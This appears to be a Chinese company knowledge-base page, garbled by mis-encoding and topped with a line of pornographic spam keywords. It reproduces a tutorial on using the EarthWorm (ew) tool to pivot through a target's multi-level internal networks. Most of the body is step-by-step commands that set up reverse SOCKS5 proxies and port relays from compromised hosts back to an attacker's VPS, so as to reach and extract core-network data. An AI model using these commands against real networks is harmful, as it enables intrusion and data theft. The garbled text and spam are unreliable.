精品国产手机自在线观,欧美亚洲高清日韩成人,狠狠躁夜夜躁人人爽天天天天,国产在线拍揄自揄拍无码,91精品国产91久久久久久久

 
您現(xiàn)在的位置:首頁 ? 知識(shí)庫 ? 系統(tǒng)集成 ? 網(wǎng)絡(luò)維護(hù) 網(wǎng)絡(luò)維護(hù)
利用 ew 輕松穿透目標(biāo)多級(jí)內(nèi)網(wǎng)
發(fā)布日期:2018-12-05

0x01 ew 快速穿透目標(biāo)多級(jí)內(nèi)網(wǎng):

簡(jiǎn)要環(huán)境說明:

1、win2008R2 假設(shè)為目標(biāo)邊界web服務(wù)器,可正常訪問公網(wǎng)假設(shè)其公網(wǎng)

2、ip 192.168.3.23

3 、假設(shè)其內(nèi)網(wǎng)ip 192.168.32.131

1、 win2008 假設(shè)為目標(biāo)內(nèi)網(wǎng)數(shù)據(jù)庫服務(wù)器,可正常訪問公網(wǎng)

2、假設(shè)其內(nèi)網(wǎng)ip 192.168.32.170

1win7 假設(shè)為自己公網(wǎng)的vps

2 、假設(shè)其公網(wǎng)ip 192.168.3.232

1、centos 5.1 假設(shè)為目標(biāo)內(nèi)網(wǎng)的一臺(tái)linux機(jī)器,沒有dns不能訪問公網(wǎng)

2、 假設(shè)其內(nèi)網(wǎng)ip 192.168.32.169

0x02 首先,利用ew做最簡(jiǎn)單的正向代理,其實(shí)就是大家最常用的所謂的ss:

win2008R2 機(jī)器上執(zhí)行

1# ew_for_Win.exe -s ssocksd -l 1080

win7上打開Proxifier根據(jù)上面監(jiān)聽的端口建立正常的socks代理即可

0x03 假設(shè)目標(biāo)機(jī)器就直接處在內(nèi)網(wǎng)[沒有公網(wǎng)ip,但可以訪問公網(wǎng)],我們也可以利用ew進(jìn)行反向socks5代理,然后直接在vps上就可以很方便的訪問目標(biāo)內(nèi)網(wǎng)中的所有機(jī)器了:

先在 win7上執(zhí)行,等待目標(biāo)反彈連接

1、# ew_for_Win.exe -s rcsocks -l 1080 -e 1234

win2008上執(zhí)行,反彈socks5連接

1# ew_for_Win.exe -s rssocks -d 192.168.3.232 -e 1234

0x04 實(shí)現(xiàn)復(fù)雜內(nèi)網(wǎng)環(huán)境下的跨網(wǎng)段多級(jí)穿透:

第一種場(chǎng)景,內(nèi)網(wǎng)機(jī)器不能訪問公網(wǎng),可通過能訪問公網(wǎng)的機(jī)器把內(nèi)網(wǎng)不能訪問公網(wǎng)機(jī)器帶出來,比較簡(jiǎn)單,如下:

1、假設(shè)win2008處在目標(biāo)內(nèi)網(wǎng)且不能訪問公網(wǎng)但可以訪問內(nèi)網(wǎng)中的資源

2、而win2008R2這臺(tái)機(jī)器上雖然有內(nèi)網(wǎng)ip,但不能訪問內(nèi)網(wǎng)資源,好在win2008R2可以訪問win2008

3、這時(shí)我們想獲取內(nèi)網(wǎng)資源就可以這樣干,先在win2008上開啟socks代理服務(wù),然后再在DMZwin2008R2連上內(nèi)網(wǎng)的win2008socks服務(wù)

4 、最后,通過win2008上的socks服務(wù)我們就可以輕松訪問目標(biāo)內(nèi)網(wǎng)中的各種資源了,具體實(shí)現(xiàn)過程如下

首先,win2008上執(zhí)行,意思就是在本地建立socks5代理,端口為1080

1、# ew_for_Win.exe -s ssocksd -l 1080

在到DMZwin2008R2上執(zhí)行,意思就是把來自外部的1090端口的流量轉(zhuǎn)到內(nèi)網(wǎng)192.168.32.170這臺(tái)機(jī)器的1080端口上

1、# ew_for_Win.exe -s lcx_tran -l 1090 -f 192.168.32.170 -g 1080

最后,再回到win7[vps]上去利用Proxifier建立正常的socks代理訪問1090端口即可,訪問vps1090就相當(dāng)于訪問內(nèi)網(wǎng)win20081080端口

第二種場(chǎng)景,還是有些機(jī)器不能訪問公網(wǎng)的情況:

1、假設(shè)win2008在內(nèi)網(wǎng)且能訪問公網(wǎng)但不能訪問內(nèi)網(wǎng)資源,centos 5.1能訪問內(nèi)網(wǎng)資源但卻無法訪問公網(wǎng),win2008可以訪問centos 5.1

2、這試,我們要想獲取內(nèi)網(wǎng)資源,就可以通過win2008centos 5.1win7[vps]之間建立一條socks5通道,實(shí)現(xiàn)過程比較簡(jiǎn)單,如下

首先,win7[實(shí)際中的vps]上執(zhí)行,把來自外部的1080端口的流量轉(zhuǎn)到本地的1379端口上

1、# ew_for_Win.exe -s lcx_listen -l 1080 -e 1379

此時(shí)回到centos 5.1上執(zhí)行,在本地啟動(dòng)socks5代理并監(jiān)聽2345端口

1# chmod +x ew_for_Linux32

2、# ./ew_for_Linux32 -s ssocksd -l 2345

然后再到win2008上去執(zhí)行,意思就是把win7[vps]1379端口和centos 5.12345進(jìn)行綁定,即建立socks5通道

1# ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1379 -f 192.168.32.169 -g 2345

最后,在回到win7[vps]建立正常的socks代理訪問即可,實(shí)際上就相當(dāng)于訪問win71080就相當(dāng)于訪問centos 5.12345端口,通過這種方式一樣也可以把整個(gè)目標(biāo)內(nèi)網(wǎng)代理出來

第三種場(chǎng)景,多級(jí)內(nèi)網(wǎng)輕松穿透:

1、假設(shè)win2008R2在內(nèi)網(wǎng)[無公網(wǎng)ip]并在一個(gè)獨(dú)立的內(nèi)網(wǎng)段,win2008也處在目標(biāo)內(nèi)網(wǎng),假設(shè)在另一個(gè)內(nèi)網(wǎng)段,centos 5.1同樣也處在內(nèi)網(wǎng),可又在另一個(gè)單獨(dú)的內(nèi)網(wǎng)段

2、且win2008R2能訪問win2008,win2008能訪問centos 5.1,centos 5.1能訪問目標(biāo)核心網(wǎng),要實(shí)現(xiàn)層層穿透,訪問到核心網(wǎng)資源,我們就可以這樣

先在win7[vps]上執(zhí)行,把來自外部的1080端口流量轉(zhuǎn)到本地的1235端口上

1、# ew_for_Win.exe -s rcsocks -l 1080 -e 1235

win2008R2上執(zhí)行,win7[vps]1235端口和內(nèi)網(wǎng)win20083456端口綁定

1# ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1235 -f 192.168.32.170 -g 3456

win2008上執(zhí)行,將來自外部的1236端口和本地的3456端口進(jìn)行綁定

1、# ew_for_Win.exe -s lcx_listen -l 3456 -e 1236

centos 5.1上執(zhí)行,將本地的socks連接反彈到win20081236端口上,此時(shí)再回到win2008上看會(huì)提示”rssocks cmd_socket OK!,說明通道已經(jīng)建立成功

1、# ./ew_for_Linux32 -s rssocks -d 192.168.32.170 -e 1236

最后,再回到win7[vps]上利用Proxifier訪問本地的1080就相當(dāng)于訪問centos 5.11236端口,即可輕松獲取核心網(wǎng)的數(shù)據(jù)

一點(diǎn)小結(jié):

關(guān)于ew,想必經(jīng)常搞內(nèi)網(wǎng)的朋友,都已經(jīng)非常熟練了,這里也就不廢話了,其實(shí),關(guān)于ew本身在實(shí)戰(zhàn)中還是比較實(shí)用的,在此也非常感謝作者的無私貢獻(xiàn),真心希望國內(nèi)能多一些這樣的人,總體來講,在工具使用上并沒有太多技術(shù)含量,關(guān)鍵還是要你自己根據(jù)目標(biāo)的實(shí)際內(nèi)網(wǎng)環(huán)境仔細(xì)弄清楚數(shù)據(jù)流向再針對(duì)性的用,上面一些簡(jiǎn)單應(yīng)用場(chǎng)景中,表面看著貌似挺復(fù)雜的,其實(shí)真正理解以后,都非常簡(jiǎn)單,深刻搞清楚這些最基本的東西你才有可能靈活應(yīng)用,什么都是如此,總是停留在’用’別人的工具上,自己沒有一點(diǎn)兒的獨(dú)立分析和想法,是很難有長進(jìn)的,后續(xù)有空會(huì)再簡(jiǎn)單介紹下關(guān)于Termite跳板機(jī)使用

 

 

  • 1.公司登記注冊(cè)于2003年1月27日,清遠(yuǎn)市桑達(dá)電子網(wǎng)絡(luò)媒體有限公司
    2.公司2006年起成為清遠(yuǎn)市政府定點(diǎn)協(xié)議供貨商,電子采購供貨商
    3.公司2007年被清遠(yuǎn)市相關(guān)政府部門評(píng)為安防行業(yè)狀元
    4.公司2007年起成為長城電腦清遠(yuǎn)如意服務(wù)站(SP368)
    5.公司2007年承建清遠(yuǎn)市橫河路口電子警察工程,開創(chuàng)清遠(yuǎn)電子警察先河。
  • 6.公司2007年起成為IBM合作伙伴、公司2010年底成為金蝶軟件清遠(yuǎn)金牌代理(伙伴編號(hào):30030013)
    7.公司組團(tuán)隊(duì)參加南方都市報(bào)組織的創(chuàng)富評(píng)選,獲廣東80強(qiáng)。公司申請(qǐng)多項(xiàng)軟件著作權(quán)、專利權(quán)
    8.2016年起公司成為粵東西北地區(qū)為數(shù)不多的雙軟企業(yè),確立“讓軟件驅(qū)動(dòng)世界,讓智能改變生活!"企業(yè)理想
    9.2016-01-29更名為廣東互動(dòng)電子網(wǎng)絡(luò)媒體有限公司
    10.2021-01-13更名為廣東互動(dòng)電子有限公司
  • 投資合作咨詢熱線電話:0763-3391888 3323588
  • 做一個(gè)負(fù)責(zé)任的百年企業(yè)! 天行健,君子以自強(qiáng)不息;地勢(shì)坤,君子以厚德載物;
    為用戶創(chuàng)造價(jià)值! 讓軟件驅(qū)動(dòng)世界; 讓智能改變生活; 超越顧客期望,幫助顧客成功;
    對(duì)客戶負(fù)責(zé),對(duì)員工負(fù)責(zé),對(duì)企業(yè)命運(yùn)負(fù)責(zé)!幫助支持公司的客戶成功;幫助忠誠于公司的員工成功!
  • 聯(lián)系電話:0763-3391888 3323588 3318977
    服務(wù)熱線:18023314222 QQ:529623964
  • 工作QQ:2501204690 商務(wù)QQ: 602045550
    投資及業(yè)務(wù)投訴QQ: 529623964
    微信:小米哥 微信號(hào):qysed3391888
    騰訊微博:桑達(dá)網(wǎng)絡(luò)-基石與起點(diǎn)
  • E-MAIL:222#QYSED.CN ok3391888#163.com (請(qǐng)用@替換#)
在線客服
  • 系統(tǒng)集成咨詢
    點(diǎn)擊這里給我發(fā)消息
  • 網(wǎng)站\微信\軟件咨詢
    點(diǎn)擊這里給我發(fā)消息
  • 售后服務(wù)
    點(diǎn)擊這里給我發(fā)消息
  • 投資合作
    點(diǎn)擊這里給我發(fā)消息